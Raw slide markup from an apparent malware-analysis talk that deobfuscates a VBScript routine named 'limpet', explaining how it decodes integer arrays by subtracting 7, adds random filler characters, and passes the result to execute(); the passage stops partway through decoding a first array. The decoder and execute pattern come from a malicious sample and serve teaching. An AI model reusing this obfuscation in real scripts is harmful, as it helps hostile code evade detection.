            <a:r>
              <a:rPr lang="en"/>
              <a:t>ERa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whoami; goals;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Mark Embrich:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A SecOps person, have been a:  Network Admin, Systems Admin, SOC Analyst, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incident Responder, Threat Hunter, Malware Analyst</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Goals:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I hope to inspire people who don't currently do malware analysis to give it a try.  (The polymorphism thing is just a hook.)</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72" name="Shape 172"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Google Shape;17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WTF is limpet?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Google Shape;174;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="0">
            <a:normAutofit lnSpcReduction="20000"/>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Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="accent6"/>
                </a:highlight>
              </a:rPr>
              <a:t>limpet(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hmx)</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chivalrous=1:pbI=9</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KONQLa = lbound(hmx)</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OOSUF = ubound(hmx)</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for judicious = KONQL to OOSUF</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Randomize</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>if hmx(judicious) = 999999 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Then</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Talmud = Talmud &amp; ChrW(Int((chivalrous-pbI+1)*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Rnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+pbI))</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Else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Talmud = Talmud &amp; ChrW(hmx(judicious) - (((5965 - (12 - 6.0)) - 292.0) - 5660.0))</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End if</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Next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limpet = Talmud</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>End Function</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78" name="Shape 178"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Google Shape;17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limpet() - setup</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="4260300" cy="34164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sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Function limpet(hmx)</a:t>
            </a:r>
            <a:endParaRPr sz="2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2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    chivalrous=1:pbI=9</a:t>
            </a:r>
            <a:endParaRPr sz="2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2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    KONQLa = lbound(hmx)</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    OOSUF = ubound(hmx)</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4833650" y="1133825"/>
            <a:ext cx="3998700" cy="3324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900"/>
              <a:t>Function myDecoder(myInput)</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>	myOne=1</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>	myNine=9</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>	myArrayStart=lbound(myInput)</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>	myArrayEnd=ubound(myInput)</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85" name="Shape 185"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Google Shape;18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limpet() - for loop</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Google Shape;187;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for judicious = KONQL to OOSUF</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Randomize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if hmx(judicious) = 999999 Then</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Talmud = Talmud &amp; ChrW(Int((chivalrous-pbI+1)*Rnd+pbI))</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Else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Talmud = Talmud &amp; ChrW(hmx(judicious) - (((5965 - (12 - 6.0)) - 292.0) - 5660.0))</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End if</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Next</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91" name="Shape 191"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;19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If clause - how we create some randomness</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;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Randomize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if myInput(myArrayAddress) = 999999 Then</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   		 myReturnValue = myReturnValue &amp; ChrW(Int((-7)*Rnd+myNine))</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sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>our possible range of values:</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en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if Rnd = 0, we get 9</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en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if Rnd = 0.9999999, we get 2.0000007, which becomes 2 due to Int()</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en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>so our range of values is from 2 to 9</a:t>
            </a:r>
            <a:endParaRPr sz="24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97" name="Shape 197"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Google Shape;19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Else clause</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Google Shape;199;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Else</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        	Talmud = Talmud &amp; ChrW(hmx(judicious) - (((5965 - (12 - 6.0)) - 292.0) - 5660.0))</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-------------------</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We can replace the equation there by doing the math, it becomes:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>myReturnValue = myReturnValue &amp; ChrW(myInput(myArrayAddress) - 7)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Couple of things to note here:</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ChrW() means we are taking an integer value and converting to a character</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-7, hmm… remember seeing a lot of "7" values in the arrays?</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203" name="Shape 203"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Google Shape;204;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Sidebar #3 - a glance at the values in the arrays</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;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206" name="Google Shape;206;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8045675" cy="3754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10" name="Shape 210"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;21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myDecoder()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;212;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9250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We pass an Array of values to myDecoder(),</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Loop through the Array,</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the integer value is "999999", we generate a random value between 2 and 9.</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Else</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Take each integer value, subtract 7</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Convert that integer value to a character</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Return the modified array</a:t>
            </a:r>
            <a:endParaRPr sz="19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216" name="Shape 216"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;21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Sidebar #4 - Let's manually decode a few</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Google Shape;218;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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Our first "execute" looks like this:</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execute(limpet(rSltLvql)):</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The first array, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rSltLvql looks like this:</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rSltLvql=Array(77,124,117,106,123,112,118,117</a:t>
            </a:r>
            <a:endParaRPr>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222" name="Shape 222"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;22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Sidebar #4 continued - first two values</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rSltLvql=Array(77,124,117,106,123</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-------------------</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We take the 77 value, subtract 7 == 70</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
